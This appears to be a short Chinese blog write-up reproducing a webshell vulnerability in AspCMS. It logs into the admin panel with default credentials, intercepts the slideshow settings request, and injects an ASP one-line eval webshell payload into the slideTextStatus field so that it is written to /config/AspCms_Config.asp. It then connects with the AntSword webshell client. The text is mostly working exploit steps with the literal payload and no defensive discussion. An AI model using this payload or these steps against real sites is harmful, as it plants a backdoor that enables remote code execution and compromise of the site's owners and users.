aspcms webshell漏洞复现

1.【ip】/admin_aspcms/login.asp访问后台,admin 123456 登录

aspcms webshell漏洞复现_第1张图片

2.点击【扩展功能】【幻灯片设置】点击【保存】开启代理进行抓包

aspcms webshell漏洞复现_第2张图片

aspcms webshell漏洞复现_第3张图片

3.在抓取的数据包中修改 slideTextStatus 字段的值为以下代码并进行发包 访问影响文件

字段值
1%25><%25Eval(Request (chr(65)))%25><%25 密码是a

影响文件
/config/AspCms_Config.asp

aspcms webshell漏洞复现_第4张图片

aspcms webshell漏洞复现_第5张图片

4.蚁剑连接

aspcms webshell漏洞复现_第6张图片

你可能感兴趣的:(asp,aspcms,getshell)